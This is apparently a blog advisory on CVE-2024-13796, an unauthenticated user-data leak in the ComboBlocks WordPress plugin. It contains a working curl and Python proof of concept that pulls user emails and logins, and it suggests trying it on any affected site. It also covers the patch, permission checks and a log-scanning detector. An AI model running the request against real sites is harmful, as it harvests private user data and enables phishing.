WordPress powers millions of websites, and plugins make it even more powerful. But even popular plugins can have serious bugs. This is the case with CVE-2024-13796, a vulnerability in The Post Grid and Gutenberg Blocks – ComboBlocks plugin. This plugin, active on thousands of WordPress sites, had a dangerous flaw that could expose private info like user emails – and attackers didn’t even need to log in!
In this deep dive, I’ll show you exactly how this bug worked – with simple explanations, code snippets, references, and real exploit details.
What Is CVE-2024-13796?
CVE-2024-13796 is a security bug found in the ComboBlocks plugin for WordPress, also known as “The Post Grid and Gutenberg Blocks – ComboBlocks.” Every version up to and including 2.3.6 is vulnerable.
What’s the Risk?
With this bug, an unauthenticated attacker (anyone, no login required) could make a special request to a hidden REST API endpoint. They could then grab user emails and other private info.
- What’s exposed: user emails and other account details
- How: via an insecure REST API endpoint, /wp-json/post-grid/v2/get_users
How Does the Vulnerability Work?
Many WordPress plugins create custom REST API endpoints, usually for AJAX or AJAX-like features in the WordPress dashboard. These should always check whether the requesting user is logged in and has the right permissions. But sometimes… mistakes happen.
The ComboBlocks plugin registers the following endpoint:
/wp-json/post-grid/v2/get_users
This returns info about site users, but there is no check that the caller is logged in or holds any special capability.
Here’s all an attacker needs to do:
GET https://victim-site.com/wp-json/post-grid/v2/get_users
No authentication. No API token. Just the public URL!
Sample (Sanitized) Output
[
  {
    "ID": 1,
    "user_login": "admin",
    "user_email": "admin@example.com",
    "display_name": "Admin",
    "user_registered": "2021-05-01 10:12:13"
  },
  {
    "ID": 2,
    "user_login": "jane",
    "user_email": "jane.doe@example.com",
    "display_name": "Jane Doe",
    "user_registered": "2021-08-21 16:45:30"
  }
  // etc...
]
Attackers can quickly harvest all WordPress users, their emails, logins, and registration dates.
Proof of Concept (PoC) Exploit
Want to see it in action? Here’s a quick proof-of-concept exploit you could run with curl or in Python.
Curl Example
curl https://victim-site.com/wp-json/post-grid/v2/get_users
Python Example
import requests

# The endpoint is unauthenticated: no cookie, nonce or token is sent with the request.
url = "https://victim-site.com/wp-json/post-grid/v2/get_users"
resp = requests.get(url, timeout=10)
resp.raise_for_status()
print(resp.json())  # JSON array of user records (ID, user_login, user_email, ...)
That’s it! Swap in any WordPress site using ComboBlocks (<=2.3.6) and you get the full user list.
Responsible Disclosure & Patches
Wordfence documented this vulnerability and worked with the plugin authors to get it fixed. The bug was assigned CVE-2024-13796.
Fix: Update the ComboBlocks plugin to the latest version (2.3.7 or higher), which blocks the endpoint for unauthorized requests.
Reference:
- Wordfence Security Advisory
How Should Plugins Handle APIs?
API endpoints like this should always check user permissions! Here’s an example of how to do it properly in WordPress:
add_action( 'rest_api_init', function () {
    register_rest_route( 'post-grid/v2', '/get_users', array(
        'methods'             => 'GET',
        'callback'            => 'my_get_users_callback',
        'permission_callback' => function () {
            return current_user_can( 'manage_options' ); // Only admins
        },
    ) );
} );
This way, the callback only runs for logged-in administrators; WordPress rejects every other request before the callback is reached.
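Besides updating, a site owner will want to know whether the endpoint was queried before the patch landed. The following is an added example, not code from the original post or the plugin: it scans constructed Apache combined-format access-log lines (sample values only) for requests to the vulnerable route, covering both the pretty /wp-json/ form and the ?rest_route= fallback WordPress also accepts, and summarises hits per source with how many were actually served.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" access-log lines for illustration; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2025:10:15:02 +0000] "GET /wp-json/post-grid/v2/get_users HTTP/1.1" 200 1842 "-" "python-requests/2.31.0"
198.51.100.4 - - [01/Mar/2025:10:15:09 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:15:11 +0000] "GET /wp-json/post-grid/v2/get_users?page=2 HTTP/1.1" 200 1790 "-" "python-requests/2.31.0"
198.51.100.21 - - [01/Mar/2025:10:40:55 +0000] "GET /?rest_route=/post-grid/v2/get_users HTTP/1.1" 200 1842 "-" "curl/8.4.0"
192.0.2.9 - - [01/Mar/2025:11:02:40 +0000] "GET /wp-json/post-grid/v2/get_users HTTP/1.1" 401 68 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

VULN_ROUTE = "/post-grid/v2/get_users"


def requested_route(target):
    """Map a request target to its REST route. WordPress serves routes both as
    /wp-json/<route> (pretty permalinks) and as ?rest_route=/<route>."""
    parts = urlsplit(target)
    if parts.path.startswith("/wp-json/"):
        return "/" + parts.path[len("/wp-json/"):].rstrip("/")
    route = parse_qs(parts.query).get("rest_route")
    return route[0].rstrip("/") if route else None


def find_get_users_hits(log_text):
    """Per-source summary of requests to the vulnerable route. A 200 means the
    site served the user list; 401/403 means a patched plugin (or a WAF) refused."""
    hits = defaultdict(lambda: {"count": 0, "served": 0, "user_agents": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or requested_route(m["target"]) != VULN_ROUTE:
            continue
        entry = hits[m["ip"]]
        entry["count"] += 1
        if m["status"] == "200":
            entry["served"] += 1
        entry["user_agents"].add(m["ua"])
    return dict(hits)


if __name__ == "__main__":
    for ip, info in find_get_users_hits(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} hit(s), {info['served']} served with 200, "
              f"UAs={sorted(info['user_agents'])}")
```

Any source with served > 0 before the upgrade to 2.3.7 should be treated as having obtained the user list, so the affected accounts deserve a heads-up about follow-on phishing.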
References
1. CVE-2024-13796 at CVE.org
2. Wordfence Advisory
3. Plugin on WordPress.org
If you own a WordPress site with ComboBlocks, update your plugin now. Attackers don’t need any special skills to grab your sensitive user data. Protect your site, your users, and your reputation!
Timeline
Published on: 02/28/2025 05:15:32 UTC
Last modified on: 03/06/2025 20:49:05 UTC